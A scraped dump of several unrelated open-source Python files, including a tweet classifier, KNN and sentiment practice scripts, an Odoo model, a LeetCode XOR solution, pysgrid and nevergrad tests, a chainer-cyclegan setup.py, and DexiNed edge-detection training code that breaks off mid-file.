Opt_test_df = test_df[test_df['Label'].isin(Opt_train_df['Label'])]
print(Opt_test_df['Label'].nunique())
Opt_test_df.reset_index(inplace=True)
split = StratifiedShuffleSplit(n_splits=1, test_size=0.1,train_size=0.9 ,random_state=19)
for train_index, test_index in split.split(Opt_train_df, Opt_train_df["Label"]):
strat_train_set = Opt_train_df.loc[train_index]
strat_test_set = Opt_train_df.loc[test_index]
x_trainingtweet = Opt_train_df.Tweets
y_trainingtweet = Opt_train_df.Label
x_trainingtweet_dev = strat_train_set.Tweets.astype('str')
y_trainingtweet_dev = strat_train_set.Label.astype('str')
x_trainingtweet_val = strat_test_set.Tweets.astype('str')
y_trainingtweet_val = strat_test_set.Label.astype('str')
x_testingtweet = Opt_test_df.Tweets
y_testingtweet = Opt_test_df.Label
label_encoder = LabelEncoder()
y_dev_trainingtweet = label_encoder.fit_transform(y_trainingtweet_dev)
y_val_trainingtweet = label_encoder.transform(y_trainingtweet_val)
y_testingtweet = label_encoder.transform(y_testingtweet)
text_mlp = Pipeline([('vect', CountVectorizer(ngram_range=(1,3),analyzer='char_wb')),('tfidf', TfidfTransformer(smooth_idf=True)),('mlp_clf', MLPClassifier(hidden_layer_sizes=(100,7),max_iter=100,learning_rate='adaptive',learning_rate_init=0.004))])
text_mlp.fit(x_trainingtweet_dev, y_dev_trainingtweet)
mlp_scores = text_mlp.score(x_testingtweet, y_testingtweet)
print('Accuracy of Development set size is %.6f'%text_mlp.score(x_trainingtweet_dev, y_dev_trainingtweet))
print('Accuracy of validation set size is %.6f'%text_mlp.score(x_trainingtweet_val, y_val_trainingtweet))
print('Accuracy of Test set size is %.6f'%mlp_scores)
from sklearn.metrics import precision_score, recall_score, f1_score, confusion_matrix
print(f1_score(y_testingtweet,text_mlp.predict(x_testingtweet), average='weighted'))
conf_mx = confusion_matrix(y_testingtweet,text_mlp.predict(x_testingtweet))
conf_mx
import matplotlib.pyplot as plt
plt.matshow(conf_mx, cmap=plt.cm.gray)
plt.show()
row_sums = conf_mx.sum(axis=1, keepdims=True)
norm_conf_mx = conf_mx / row_sums
np.fill_diagonal(norm_conf_mx, 0)
plt.matshow(norm_conf_mx, cmap=plt.cm.gray)
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
d060ae03bafd519e0887b2a4bc2d04c63345c116 | 95e5da0f1b811e8f3e5a964ed3efc55e927b0c60 | /knn.py | 06d5f489153a04654901c8f5d46f3c0ef7727172 | [] | no_license | delta9874/ML-practice | 40dfbb089fa1fc39c323c12aaaf3655f2ba55d3c | 657dee66302516479c0dc73259c4f04f6e5e45bd | refs/heads/master | 2020-06-18T20:42:28.696737 | 2019-07-11T17:46:26 | 2019-07-11T17:46:26 | 196,440,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,976 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 13 15:05:49 2019
@author: delta
"""
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn import model_selection
from sklearn import metrics
from sklearn import ensemble
from datetime import datetime
from sklearn.preprocessing import StandardScaler
from sklearn import utils
from sklearn import neighbors
from sklearn import preprocessing
df=pd.read_csv("/home/delta/dataset/startups.csv")
df.info()
df.rename(columns={"R&D Spend":"rs","Administration":"adm","Marketing Spend":"ms"},inplace=True)
df.info()
######label encoding
state_encoder=preprocessing.LabelEncoder()
df["enc_state"]=state_encoder.fit_transform(df["State"])
df["enc_state"]
################
df.head()
df.drop("State",axis=1,inplace=True)
df.info()
X=df.drop("Profit",axis=1)
y=df["Profit"]
Xtrain,Xtest,ytrain,ytest=model_selection.train_test_split(X,y,test_size=0.15,random_state=42)
Xtrain.info()
knnmodel=neighbors.KNeighborsRegressor(n_neighbors=11)
knnmodel.fit(Xtrain,ytrain)
#fit doesnt create model ,but it create a data structure which help us to search easier
#kdtree
#balltree
#brute
#alogorithm="........."
prediction=knnmodel.predict(Xtest)
print(np.sqrt(metrics.mean_squared_error(ytest,prediction)))
X[:3]
#standard scaling
avg=df.rs.mean()
sd=df.rs.std()
t=(df.rs-avg)/sd
t[:3]
#min max scaling
#robust scaling-used in case of outlairs,is not affected by outlairs
colnames=X.columns.values
rb_scaler=preprocessing.RobustScaler()
X_scaled=rb_scaler.fit_transform(X)
X_scaled[:3]#return a numpy array
X_Sc=pd.DataFrame(X_scaled,columns=colnames)
Xtrain,Xtest,ytrain,ytest=model_selection.train_test_split(X_Sc,y,test_size=0.15,random_state=42)
Xtrain.info()
knnmodel=neighbors.KNeighborsRegressor(n_neighbors=11)
knnmodel.fit(Xtrain,ytrain)
prediction=knnmodel.predict(Xtest)
print(np.sqrt(metrics.mean_squared_error(ytest,prediction)))
| [
"noreply@github.com"
] | noreply@github.com |
619937df9bc5ad69bb41fd822a6d57377e711e63 | d659fb0db310793b918640fdb673b9bd755578bc | /third_party/text_analysis.py | 77b623298203a576c583c2364375d44483e1c9d1 | [
"MIT"
] | permissive | astuk/python-snippets | 562bdcdb23c537650a767fb0369388d9530a67ae | 212f63f820b6f5842f74913ed08da18d41dfe7a4 | refs/heads/master | 2023-06-18T04:29:48.111537 | 2021-07-14T10:55:59 | 2021-07-14T10:55:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | from pathlib import Path
from textblob import TextBlob
path = Path("src/text.txt")
with open(path) as f:
text = f.read()
blob = TextBlob(text)
for sentence in blob.sentences:
print(sentence.sentiment.polarity)
| [
"f2dahlitz@freenet.de"
] | f2dahlitz@freenet.de |
ee9570ac547bccf91a414edc9b5d73e065cfd695 | 9f26388284fb7900d28f64c0a87dc9d042661f3d | /linggajati_membership/models/models.py | 9efb1861ca20d505287e40bbe39a4e101f4d2fd6 | [] | no_license | suningwz/gnbs-project-module | 574742744e8a4a8bee0719cd7764d17d423719d6 | 4122376edfa6663b072b8f2946b036bd814ee7ef | refs/heads/main | 2023-04-15T16:21:32.473932 | 2021-04-30T01:32:25 | 2021-04-30T01:32:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | from odoo import api, fields, models
class ResPartner(models.Model):
_inherit = 'res.partner'
@api.model
def get_all_data(self):
# result = {}
result = []
res_partner = self.env['res.partner'].search([])
# print('rest partner :', res_partner)
# print('email :', res_partner['id'])
# Dictionary
# i = -1
# for data in res_partner:
# i += 1
# result['email'].appenddata.email
# result['id'] = data.id
# print('result ',i,' : ',result['email'])
# print('result ',i,' : ',result['id'])
# print(result)
# i = -1
for data in res_partner:
# i += 1
result.append(data.email)
# print('email ',i,' : ',result[i])
# print('result :',result)
return(result) | [
"abuabdirohman4@gmail.com"
] | abuabdirohman4@gmail.com |
45a1d583380f1466e5d9bdfac955d73b744aaf1a | d295d1b46b4694095587e36be504b44369fde06f | /chapter_19/136_Single_Number.py | 06d7bebec25f148d1e159568c1981b195217bf8c | [] | no_license | AIFFEL-coma-team01/Sanghyo | 3f58acb31d834591c50027dd974cfc236132b13a | 1e3b7c85157fa4fb437e0e12896331fb84451a90 | refs/heads/master | 2023-04-24T06:25:09.701974 | 2021-05-11T15:38:22 | 2021-05-11T15:38:22 | 329,206,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,697 | py | '''
Given a non-empty array of integers nums, every element appears twice except for one. Find that single one.
비어 있지 않은 정수 배열이 주어지면 모든 요소는 하나를 제외하고 두 번 나타납니다. 그 하나를 찾으십시오.
Follow up: Could you implement a solution with a linear runtime complexity and without using extra memory?
후속 조치 : 추가 메모리를 사용하지 않고 선형 런타임 복잡성으로 솔루션을 구현할 수 있나요?
Example 1:
Input: nums = [2,2,1]
Output: 1
Example 2:
Input: nums = [4,1,2,1,2]
Output: 4
Example 3:
Input: nums = [1]
Output: 1
'''
# 딱 하나를 제외하고 모든 에ㅔㄹ리먼트는 2개씩 있다. 1개인 엘리먼트를 찾아라
# 배타적 OR = XOR 을 활용한 문제풀이
# 0 0 = 0
# 0 1 = 1
# 1 1 = 1
# 1 1 = 0
# 입력이 서로 다르면 True
# 입력이 서로 동일하면 False
# 따라서, 배열의 모든 요소를 XOR연산 하면 한번만 등장하는 요소만 남게 됨
class Solution(object):
def singleNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
result = 0
for num in nums:
result ^= num
return result
#96 ms
'''
class Solution(object):
def singleNumber(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
nums.sort()
i=0
while (i<len(nums)):
if len(nums)==1:
return nums[i]
if nums[i]==nums[i+1]:
nums.remove(nums[i])
nums.remove(nums[i])
#print(nums)
else:
return nums[i]
'''
| [
"howixxxxu@gmail.com"
] | howixxxxu@gmail.com |
0305bffab91530450d963a852da22b235312750e | 41d1e085dc3ec6c329b8d6443035e1e8a1c93bcc | /gridded/tests/test_pysgrid/test_processing_2d.py | dc315187cf10aeba2e0c9777265a7f8e7304e614 | [
"Unlicense"
] | permissive | Ocean1125/gridded | 9252d3d89ecacc55c59a0ecf6fd60fe6ac0afd6e | 90cca5edf4c8d9a47914c2b6d6f78180d9c280a5 | refs/heads/master | 2023-05-15T13:21:34.144583 | 2021-06-03T21:50:01 | 2021-06-03T21:50:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,341 | py | """
Created on Apr 3, 2015
@author: ayan
"""
from __future__ import (absolute_import, division, print_function)
import pytest
import numpy as np
from gridded.pysgrid.processing_2d import avg_to_cell_center, rotate_vectors, vector_sum
def test_vector_sum():
x_vector = np.array([3, 5, 9, 11])
y_vector = np.array([4, 12, 40, 60])
sum_result = vector_sum(x_vector, y_vector)
expected = np.array([5, 13, 41, 61])
np.testing.assert_almost_equal(sum_result, expected)
@pytest.fixture
def rotate_vectors_data():
x = np.array([3, 5, 9, 11])
y = np.array([4, 12, 40, 60])
angles_simple = np.array([0, np.pi / 2, 0, np.pi / 2])
angles_complex = np.array([np.pi / 6, np.pi / 5,
np.pi / 4, np.pi / 3])
return x, y, angles_simple, angles_complex
def test_vector_rotation_simple(rotate_vectors_data):
x, y, angles_simple, angles_complex = rotate_vectors_data
rotated_x, rotated_y = rotate_vectors(x, y, angles_simple)
expected_x = np.array([3, -12, 9, -60])
expected_y = np.array([4, 5, 40, 11])
np.testing.assert_almost_equal(rotated_x, expected_x, decimal=3)
np.testing.assert_almost_equal(rotated_y, expected_y, decimal=3)
def test_vector_rotation_complex(rotate_vectors_data):
x, y, angles_simple, angles_complex = rotate_vectors_data
rotated_x, rotated_y = rotate_vectors(x, y, angles_complex)
expected_x = np.array([0.5981, -3.0083, -21.9203, -46.4615])
expected_y = np.array([4.9641, 12.6471, 34.6482, 39.5263])
np.testing.assert_almost_equal(rotated_x, expected_x, decimal=3)
np.testing.assert_almost_equal(rotated_y, expected_y, decimal=3)
@pytest.fixture
def avg_center_data():
return np.array([[4, 5, 9, 10], [8, 39, 41, 20], [5, 29, 18, 71]])
def test_no_transpose(avg_center_data):
data = avg_center_data
avg_result = avg_to_cell_center(data, 1)
expected = np.array([[4.5, 7, 9.5],
[23.5, 40, 30.5],
[17, 23.5, 44.5]])
np.testing.assert_almost_equal(avg_result, expected, decimal=3)
def test_with_transpose(avg_center_data):
data = avg_center_data
avg_result = avg_to_cell_center(data, 0)
expected = np.array([[6, 22, 25, 15], [6.5, 34, 29.5, 45.5]])
np.testing.assert_almost_equal(avg_result, expected, decimal=3)
| [
"Chris.Barker@noaa.gov"
] | Chris.Barker@noaa.gov |
69b97a113143d549bb453db303f2de95572d0f28 | c9133d4769c73a07ed758321173be45fa342dc89 | /nevergrad/functions/powersystems/test_core.py | bb9a1893289c4bc1783d715ecde45308c1b77c59 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Dvermetten/nevergrad | dd1d2c6d483e13bc292b40fe07c8669f38c7e065 | 850418e9e4d00ee2e4fc12d8fc7a6981b0152641 | refs/heads/master | 2022-12-31T05:22:56.887260 | 2020-10-14T10:30:10 | 2020-10-14T10:30:10 | 276,113,571 | 0 | 0 | MIT | 2020-09-25T12:11:19 | 2020-06-30T13:54:19 | Python | UTF-8 | Python | false | false | 805 | py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from unittest.mock import patch
import numpy as np
from . import core
def test_powersystem() -> None:
func = core.PowerSystem()
x = [7 * np.random.rand(func.dimension // 13) for _ in range(13)]
value = func.function(x) # should not touch boundaries, so value should be < np.inf
assert value < np.inf
@patch(f"{__name__}.core.plt")
def test_make_plots(mock_plt):
func = core.PowerSystem()
func.losses = [0.1]
func.make_plots("not_valid.png")
assert mock_plt.clf.call_count == 1
assert mock_plt.subplot.call_count == 4
assert mock_plt.savefig.call_count == 1
| [
"noreply@github.com"
] | noreply@github.com |
00d78c4a4adeb9bd9683c99726c067a3d7829696 | 80d9806dfb09858875c77c285a3ce1ce496dbbcd | /setup.py | d418d3608286c45bad5380aed630c48c76ffa793 | [] | no_license | wkentaro/chainer-cyclegan | 86e9a5a3c8aae03caf37940209aa432738478989 | 64b811773802e4d755eebb5110735f8953beb220 | refs/heads/master | 2021-10-23T15:33:26.856556 | 2019-03-18T13:00:07 | 2019-03-18T13:00:07 | 114,517,994 | 13 | 4 | null | 2018-03-30T14:40:41 | 2017-12-17T07:32:05 | Python | UTF-8 | Python | false | false | 982 | py | import subprocess
import sys
from setuptools import find_packages
from setuptools import setup
version = '1.2.5'
if sys.argv[-1] == 'release':
commands = [
'python setup.py sdist upload',
'git tag v{0}'.format(version),
'git push origin master --tag',
]
for cmd in commands:
subprocess.call(cmd, shell=True)
sys.exit(0)
try:
import cv2 # NOQA
except ImportError:
print('Please install OpenCV.')
quit(1)
install_requires = []
with open('requirements.txt') as f:
for req in f:
if req.startswith('-e'):
continue
install_requires.append(req.strip())
setup(
name='chainer-cyclegan',
description='Chainer Implementation of CycleGAN.',
version=version,
packages=find_packages(),
install_requires=install_requires,
author='Kentaro Wada',
author_email='www.kentaro.wada@gmail.com',
url='https://github.com/wkentaro/chainer-cyclegan',
license='MIT',
)
| [
"www.kentaro.wada@gmail.com"
] | www.kentaro.wada@gmail.com |
0cb1ceb7d98c6a2de4c393b4e2b6c54464cba5f0 | 0a3677a38ad1431d5fe07b5f15c70bbd1ba64741 | /DexiNed/DexiNed-Pytorch/main.py | 3d652142af958f0cfedd1e170e05446e17182f11 | [
"MIT"
] | permissive | Tubbz-alt/sketch2cat-pulse | 5374c8f9dea8e2525a56d2acec8b72ef0787831e | 0f02363757eb072078d5ed866067eefc7df2a233 | refs/heads/master | 2023-01-15T20:20:32.072643 | 2020-07-27T00:20:34 | 2020-07-27T00:20:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,531 | py |
from __future__ import print_function
import os, sys, time
import argparse
import cv2 as cv
import numpy as np
import random # import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
from torchvision.transforms import transforms
import kornia as tgm
from model import DexiNet
from losses import weighted_cross_entropy_loss
from dexi_utils import cv_imshow, dataset_info
class testDataset(Dataset):
def __init__(self, data_root, arg = None):
self.data_root = data_root
self.arg = arg
self.transforms = transforms
self.mean_bgr = arg.mean_pixel_values[0:3] if len(arg.mean_pixel_values)==4\
else arg.mean_pixel_values
self.data_index = self._build_index()
def _build_index(self):
sample_indices = []
if not self.arg.test_data == "CLASSIC":
list_name = os.path.join(self.data_root,self.arg.test_list)#os.path.abspath(self.data_root)
with open(list_name,'r') as f:
files = f.readlines()
files = [line.strip() for line in files]
pairs = [line.split() for line in files]
images_path = [line[0] for line in pairs]
labels_path = [line[1] for line in pairs]
sample_indices = [images_path,labels_path]
else:
# for single image testing
images_path = os.listdir(self.data_root)
labels_path = None
sample_indices = [images_path, labels_path]
return sample_indices
def __len__(self):
return len(self.data_index[0])
def __getitem__(self, idx):
# get data sample
# image_path, label_path = self.data_index[idx]
image_path = self.data_index[0][idx]
label_path = self.data_index[1][idx] if not self.arg.test_data=="CLASSIC" else None
img_name = os.path.basename(image_path)
file_name = img_name[:-3]+"png"
# base dir
if self.arg.test_data.upper() == 'BIPED':
img_dir = os.path.join(self.arg.input_val_dir,'imgs','test')
gt_dir = os.path.join(self.arg.input_val_dir,'edge_maps','test')
elif self.arg.test_data.upper() == 'CLASSIC':
img_dir = self.arg.input_val_dir
gt_dir = None
else:
img_dir = self.arg.input_val_dir
gt_dir = self.arg.input_val_dir
# load data
image = cv.imread(os.path.join(img_dir,image_path), cv.IMREAD_COLOR)
if not self.arg.test_data == "CLASSIC":
label = cv.imread(os.path.join(gt_dir,label_path), cv.IMREAD_COLOR)
else:
label=None
im_shape =[image.shape[0],image.shape[1]]
image, label = self.transform(img=image, gt=label)
return dict(images=image, labels=label, file_names=file_name,image_shape=im_shape)
def transform(self, img, gt):
# gt[gt< 51] = 0 # test without gt discrimination
if self.arg.test_data=="CLASSIC":
img_height = img.shape[0] if img.shape[0] % 16 == 0 else ((img.shape[0] // 16) + 1) * 16
img_width = img.shape[1] if img.shape[1] % 16 == 0 else ((img.shape[1] // 16) + 1) * 16
print('Real-size:',img.shape, "Ideal size:",[img_height,img_width])
img = cv.resize(img, (self.arg.test_im_width,self.arg.test_im_height))
gt = None
elif img.shape[0]<512 or img.shape[1]<512:
img = cv.resize(img, (512, 512))
gt = cv.resize(gt, (512, 512))
elif img.shape[0]%16!=0 or img.shape[1]%16!=0:
img_width = ((img.shape[1] // 16) + 1) * 16
img_height = ((img.shape[0] // 16) + 1) * 16
img = cv.resize(img, (img_width, img_height))
gt = cv.resize(gt, (img_width, img_height))
# if self.yita is not None:
# gt[gt >= self.yita] = 1
img = np.array(img, dtype=np.float32)
# if self.rgb:
# img = img[:, :, ::-1] # RGB->BGR
if not self.arg.test_data=="CLASSIC":
gt = np.array(gt, dtype=np.float32)
if len(gt.shape) == 3:
gt = gt[:, :, 0]
gt /= 255.
gt = torch.from_numpy(np.array([gt])).float()
else:
gt = np.zeros((img.shape[:2]))
gt=torch.from_numpy(np.array([gt])).float()
img -= self.mean_bgr
img = img.transpose((2, 0, 1))
img = torch.from_numpy(img.copy()).float()
return img, gt
class BipedMyDataset(Dataset):
train_modes = ['train', 'test',]
dataset_types = ['rgbr',]
data_types = ['aug',]
def __init__(self, data_root, train_mode='train', dataset_type='rgbr',
is_scaling=None, arg=None):
self.data_root = data_root
self.train_mode = train_mode
self.dataset_type = dataset_type
self.data_type = 'aug' # be aware that this might change in the future
self.scale = is_scaling
self.arg =arg
self.mean_bgr = arg.mean_pixel_values[0:3] if len(arg.mean_pixel_values) == 4 \
else arg.mean_pixel_values
self.data_index = self._build_index()
def _build_index(self):
assert self.train_mode in self.train_modes, self.train_mode
assert self.dataset_type in self.dataset_types, self.dataset_type
assert self.data_type in self.data_types, self.data_type
sample_indices = []
data_root = os.path.abspath(self.data_root)
images_path = os.path.join(data_root, 'imgs', self.train_mode,
self.dataset_type, self.data_type)
labels_path = os.path.join(data_root, 'edge_maps', self.train_mode,
self.dataset_type, self.data_type)
for directory_name in os.listdir(images_path):
image_directories = os.path.join(images_path, directory_name)
for file_name_ext in os.listdir(image_directories):
file_name = file_name_ext[:-4]
sample_indices.append(
(os.path.join(images_path, directory_name, file_name + '.jpg'),
os.path.join(labels_path, directory_name, file_name + '.png'),)
)
return sample_indices
def __len__(self):
return len(self.data_index)
def __getitem__(self, idx):
# get data sample
image_path, label_path = self.data_index[idx]
# load data
image = cv.imread(image_path, cv.IMREAD_COLOR)
label = cv.imread(label_path, cv.IMREAD_GRAYSCALE)
image, label = self.transform(img=image, gt=label)
return dict(images=image, labels=label)
def transform(self, img, gt):
gt = np.array(gt, dtype=np.float32)
if len(gt.shape) == 3:
gt = gt[:, :, 0]
# gt[gt< 51] = 0 # test without gt discrimination
gt /= 255.
# if self.yita is not None:
# gt[gt >= self.yita] = 1
img = np.array(img, dtype=np.float32)
# if self.rgb:
# img = img[:, :, ::-1] # RGB->BGR
img -= self.mean_bgr
# data = []
# if self.scale is not None:
# for scl in self.scale:
# img_scale = cv.resize(img, None, fx=scl, fy=scl, interpolation=cv.INTER_LINEAR)
# data.append(torch.from_numpy(img_scale.transpose((2, 0, 1))).float())
# return data, gt
crop_size = self.arg.img_height if self.arg.img_height == self.arg.img_width else 400
if self.arg.crop_img:
_, h, w = gt.size()
assert (crop_size < h and crop_size < w)
i = random.randint(0, h - crop_size)
j = random.randint(0, w - crop_size)
img = img[:, i:i + crop_size, j:j + crop_size]
gt = gt[:, i:i + crop_size, j:j + crop_size]
else:
img = cv.resize(img, dsize=(self.arg.img_width, self.arg.img_height ))
gt = cv.resize(gt, dsize=(self.arg.img_width, self.arg.img_height ))
img = img.transpose((2, 0, 1))
img = torch.from_numpy(img.copy()).float()
gt = torch.from_numpy(np.array([gt])).float()
return img, gt
def image_normalization(img, img_min=0, img_max=255):
"""This is a typical image normalization function
where the minimum and maximum of the image is needed
source: https://en.wikipedia.org/wiki/Normalization_(image_processing)
:param img: an image could be gray scale or color
:param img_min: for default is 0
:param img_max: for default is 255
:return: a normalized image, if max is 255 the dtype is uint8
"""
img = np.float32(img)
epsilon=1e-12 # whenever an inconsistent image
img = (img-np.min(img))*(img_max-img_min)/((np.max(img)-np.min(img))+epsilon)+img_min
return img
def restore_rgb(config,I, restore_rgb=False):
"""
:param config: [args.channel_swap, args.mean_pixel_value]
:param I: and image or a set of images
:return: an image or a set of images restored
"""
if len(I)>3 and not type(I)==np.ndarray:
I =np.array(I)
I = I[:,:,:,0:3]
n = I.shape[0]
for i in range(n):
x = I[i,...]
x = np.array(x, dtype=np.float32)
x += config[1]
if restore_rgb:
x = x[:, :, config[0]]
x = image_normalization(x)
I[i,:,:,:]=x
elif len(I.shape)==3 and I.shape[-1]==3:
I = np.array(I, dtype=np.float32)
I += config[1]
if restore_rgb:
I = I[:, :, config[0]]
I = image_normalization(I)
else:
print("Sorry the input data size is out of our configuration")
# print("The enterely I data {} restored".format(I.shape))
return I
def visualize_result(imgs_list, arg):
"""
data 2 image in one matrix
:param imgs_list: a list of prediction, gt and input data
:param arg:
:return: one image with the whole of imgs_list data
"""
n_imgs = len(imgs_list)
data_list =[]
for i in range(n_imgs):
tmp = imgs_list[i]
if tmp.shape[1]==3:
tmp = np.transpose(np.squeeze(tmp[1]),[1,2,0])
tmp=restore_rgb([arg.channel_swap,arg.mean_pixel_values[:3]],tmp)
tmp = np.uint8(image_normalization(tmp))
else:
tmp= np.squeeze(tmp[1])
if len(tmp.shape) == 2:
tmp = np.uint8(image_normalization(tmp))
tmp = cv.bitwise_not(tmp)
tmp = cv.cvtColor(tmp, cv.COLOR_GRAY2BGR)
else:
tmp = np.uint8(image_normalization(tmp))
data_list.append(tmp)
img = data_list[0]
if n_imgs % 2 == 0:
imgs = np.zeros((img.shape[0] * 2 + 10, img.shape[1] * (n_imgs // 2) + ((n_imgs // 2 - 1) * 5), 3))
else:
imgs = np.zeros((img.shape[0] * 2 + 10, img.shape[1] * ((1 + n_imgs) // 2) + ((n_imgs // 2) * 5), 3))
n_imgs += 1
k=0
imgs = np.uint8(imgs)
i_step = img.shape[0]+10
j_step = img.shape[1]+5
for i in range(2):
for j in range(n_imgs//2):
if k<len(data_list):
imgs[i*i_step:i*i_step+img.shape[0],j*j_step:j*j_step+img.shape[1],:]=data_list[k]
k+=1
else:
pass
return imgs
def create_directory(dir_path):
"""Creates an empty directory.
Args:
dir_path (str): the absolute path to the directory to create.
"""
if not os.path.exists(dir_path):
os.makedirs(dir_path)
def train(epoch, dataloader, model, criterion, optimizer, device,
log_interval_vis, tb_writer, args=None):
imgs_res_folder =os.path.join(args.output_dir,'current_res')
create_directory(imgs_res_folder)
model.train()
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device) # BxCxHxW
labels = sample_batched['labels'].to(device) # BxHxW
# labels = labels[:, None] # Bx1xHxW
preds_list = model(images)
loss = sum([criterion(preds, labels) for preds in preds_list])
loss /= images.shape[0] # the batch size
optimizer.zero_grad()
loss.backward()
optimizer.step()
if batch_id%5==0:
print(time.ctime(),'Epoch: {0} Sample {1}/{2} Loss: {3}' \
.format(epoch, batch_id, len(dataloader), loss.item()))
if tb_writer is not None:
tb_writer.add_scalar('data/loss', loss.detach(), (len(dataloader)*epoch+batch_id))
if batch_id % log_interval_vis == 0:
res_data = []
img = images.cpu().numpy()
res_data.append(img)
ed_gt = labels.cpu().numpy()
res_data.append(ed_gt)
for i in range(len(preds_list)):
tmp = preds_list[i]
tmp = torch.sigmoid(tmp)
tmp = tmp.cpu().detach().numpy()
res_data.append(tmp)
vis_imgs = visualize_result(res_data, arg=args)
del tmp, res_data
vis_imgs = cv.resize(vis_imgs,(int(vis_imgs.shape[1]*0.8),int(vis_imgs.shape[0]*0.8)))
img_test = 'Epoch: {0} Sample {1}/{2} Loss: {3}' \
.format(epoch, batch_id, len(dataloader), loss.item())
BLACK = (0, 0, 255)
font = cv.FONT_HERSHEY_SIMPLEX
font_size = 1.1
font_color = BLACK
font_thickness = 2
x, y = 30, 30
vis_imgs = cv.putText(vis_imgs, img_test, (x, y), font, font_size, font_color, font_thickness, cv.LINE_AA)
cv.imwrite(os.path.join(imgs_res_folder,'results.png'),vis_imgs)
def save_image_batch_to_disk(tensor, output_dir, file_names, img_shape=None,arg=None):
os.makedirs(output_dir,exist_ok=True)
if not arg.is_testing:
assert len(tensor.shape) == 4, tensor.shape
for tensor_image, file_name in zip(tensor, file_names):
image_vis = tgm.utils.tensor_to_image(torch.sigmoid(tensor_image))[..., 0]
image_vis = (255.0*(1.0- image_vis)).astype(np.uint8) #
output_file_name = os.path.join(output_dir, file_name)
assert cv.imwrite(output_file_name, image_vis)
else:
output_dir_f = os.path.join(output_dir,'f')
output_dir_a = os.path.join(output_dir,'a')
os.makedirs(output_dir_f, exist_ok=True)
os.makedirs(output_dir_a,exist_ok=True)
# 255.0 * (1.0 - em_a)
edge_maps = []
for i in tensor:
tmp = torch.sigmoid(i).cpu().detach().numpy()
edge_maps.append(tmp)
# edge_maps.append(tmp)
tensor = np.array(edge_maps)
idx =0
image_shape = [x.cpu().detach().numpy() for x in img_shape]
image_shape = [[y, x] for x, y in zip(image_shape[0], image_shape[1])]
for i_shape, file_name in zip(image_shape,file_names):
tmp = tensor[:,idx,...]
tmp = np.transpose(np.squeeze(tmp),[0,1,2])
preds = []
for i in range(tmp.shape[0]):
tmp_img = tmp[i]
tmp_img[tmp_img<0.0] = 0.0
tmp_img =255.0 * (1.0 - tmp_img)
if not tmp_img.shape[1]==i_shape[0] or not tmp_img.shape[0]==i_shape[1]:
tmp_img = cv.resize(tmp_img,(i_shape[0],i_shape[1]))
preds.append(tmp_img)
if i==6:
fuse = tmp_img
average = np.array(preds,dtype=np.float32)
average = np.uint8(np.mean(average,axis=0))
output_file_name_f = os.path.join(output_dir_f, file_name)
output_file_name_a = os.path.join(output_dir_a, file_name)
assert cv.imwrite(output_file_name_f, fuse)
assert cv.imwrite(output_file_name_a, np.uint8(average))
idx+=1
def validation(epoch, dataloader, model, device, output_dir, arg=None):
model.eval()
total_losses = []
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
output = model(images)
save_image_batch_to_disk(output[-1], output_dir, file_names, arg=arg)
def weight_init(m):
if isinstance(m, (nn.Conv2d, )):
torch.nn.init.normal_(m.weight,mean=0, std=0.01)
if m.weight.data.shape[1]==torch.Size([1]):
torch.nn.init.normal_(m.weight, mean=0.0,)
if m.weight.data.shape==torch.Size([1,6,1,1]):
torch.nn.init.constant_(m.weight,0.2)
if m.bias is not None:
torch.nn.init.zeros_(m.bias)
# for fusion layer
if isinstance(m, (nn.ConvTranspose2d,)):
torch.nn.init.normal_(m.weight,mean=0, std=0.01)
if m.weight.data.shape[1] == torch.Size([1]):
torch.nn.init.normal_(m.weight, std=0.1)
if m.bias is not None:
torch.nn.init.zeros_(m.bias)
def main():
# Testing settings
DATASET_NAME= ['BIPED','BSDS','BSDS300','CID','DCD','MULTICUE',
'PASCAL','NYUD','CLASSIC'] # 8
TEST_DATA = DATASET_NAME[8]
data_inf = dataset_info(TEST_DATA)
# training settings
parser = argparse.ArgumentParser(description='Training application.')
# Data parameters
parser.add_argument('--input-dir', type=str,default='/opt/dataset/BIPED/edges',
help='the path to the directory with the input data.')
parser.add_argument('--input-val-dir', type=str,default=data_inf['data_dir'],
help='the path to the directory with the input data for validation.')
parser.add_argument('--output_dir', type=str, default='checkpoints',
help='the path to output the results.')
parser.add_argument('--test_data', type=str, default=TEST_DATA,
help='Name of the dataset.')
parser.add_argument('--test_list', type=str, default=data_inf['file_name'],
help='Name of the dataset.')
parser.add_argument('--is_testing', type=bool, default=True,
help='Just for testing')
parser.add_argument('--use_prev_trained', type=bool, default=True,
help='use previous trained data') # Just for test
parser.add_argument('--checkpoint_data', type=str, default='24/24_model.pth',
help='Just for testing') # '19/19_*.pht'
parser.add_argument('--test_im_width', type=int, default=data_inf['img_width'],
help='image height for testing')
parser.add_argument('--test_im_height', type=int, default=data_inf['img_height'],
help=' image height for testing')
parser.add_argument('--res_dir', type=str, default='result',
help='Result directory')
parser.add_argument('--log-interval-vis', type=int, default=50,
help='how many batches to wait before logging training status')
# Optimization parameters
parser.add_argument('--optimizer', type=str, choices=['adam', 'sgd'], default='adam',
help='the optimization solver to use (default: adam)')
parser.add_argument('--num-epochs', type=int, default=25, metavar='N',
help='number of training epochs (default: 100)')
# parser.add_argument('--lr', type=float, default=1e-3, metavar='LR',
# help='learning rate (default: 1e-3)')
parser.add_argument('--wd', type=float, default=1e-5, metavar='WD',
help='weight decay (default: 1e-5)')
parser.add_argument('--lr', default=1e-4, type=float,
